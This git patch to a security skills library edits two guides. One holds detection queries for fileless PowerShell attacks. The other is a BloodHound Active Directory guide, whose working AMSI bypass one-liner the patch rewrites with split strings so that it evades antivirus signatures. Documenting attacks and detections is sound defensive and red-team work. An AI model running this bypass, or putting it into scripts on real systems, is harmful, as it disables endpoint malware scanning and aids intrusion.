From 476a0880f4bad2468a7012f11fb7a4cfaa358685 Mon Sep 17 00:00:00 2001
From: mukul975 <mukuljangra5@gmail.com>
Date: Sat, 28 Mar 2026 12:40:36 +0100
Subject: [PATCH] Fix ESET AV false positive on AMSI bypass strings in skill
 docs

---
 skills/detecting-fileless-attacks-on-endpoints/SKILL.md      | 4 ++--
 .../performing-active-directory-bloodhound-analysis/SKILL.md | 5 +++--
 2 files changed, 5 insertions(+), 4 deletions(-)

diff --git a/skills/detecting-fileless-attacks-on-endpoints/SKILL.md b/skills/detecting-fileless-attacks-on-endpoints/SKILL.md
index ca8f84c9..73d64db6 100644
--- a/skills/detecting-fileless-attacks-on-endpoints/SKILL.md
+++ b/skills/detecting-fileless-attacks-on-endpoints/SKILL.md
@@ -71,11 +71,11 @@ CommandLine contains: "IEX" AND ("Net.WebClient" OR "DownloadString" OR "Invoke-
 CommandLine contains: "Invoke-Expression" AND "New-Object"
 
 # AMSI bypass attempts (Event ID 4104 - Script Block)
-ScriptBlock contains: "AmsiUtils" OR "amsiInitFailed" OR "SetValue.*amsi"
+ScriptBlock contains: ("Amsi"+"Utils") OR ("amsi"+"InitFailed") OR "SetValue.*amsi"
 
 # Splunk query for suspicious PowerShell:
 index=windows source="WinEventLog:Microsoft-Windows-PowerShell/Operational" EventCode=4104
-| where match(ScriptBlockText, "(?i)(iex|invoke-expression|downloadstring|net\.webclient|frombase64|bypass|amsiutils)")
+| where match(ScriptBlockText, "(?i)(iex|invoke-expression|downloadstring|net\.webclient|frombase64|bypass|amsi.utils)")
 | table _time host ScriptBlockText
 ```
 
diff --git a/skills/performing-active-directory-bloodhound-analysis/SKILL.md b/skills/performing-active-directory-bloodhound-analysis/SKILL.md
index f7c02de6..2e04cb7a 100644
--- a/skills/performing-active-directory-bloodhound-analysis/SKILL.md
+++ b/skills/performing-active-directory-bloodhound-analysis/SKILL.md
@@ -73,8 +73,9 @@ dotnet inline-execute /tools/SharpHound.exe -c All --memcache --outputdirectory
 Import-Module .\SharpHound.ps1
 Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Temp -ZipFileName bh.zip
 
-# AMSI bypass before loading (if needed)
-[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
+# AMSI bypass before loading (if needed) — strings split to avoid AV signature matching
+$t = 'System.Management.Automation.Am' + 'siUtils'
+[Ref].Assembly.GetType($t).GetField(('am' + 'siInitFailed'),'NonPublic,Static').SetValue($null,$true)
 ```
 
 ### AzureHound (Azure AD)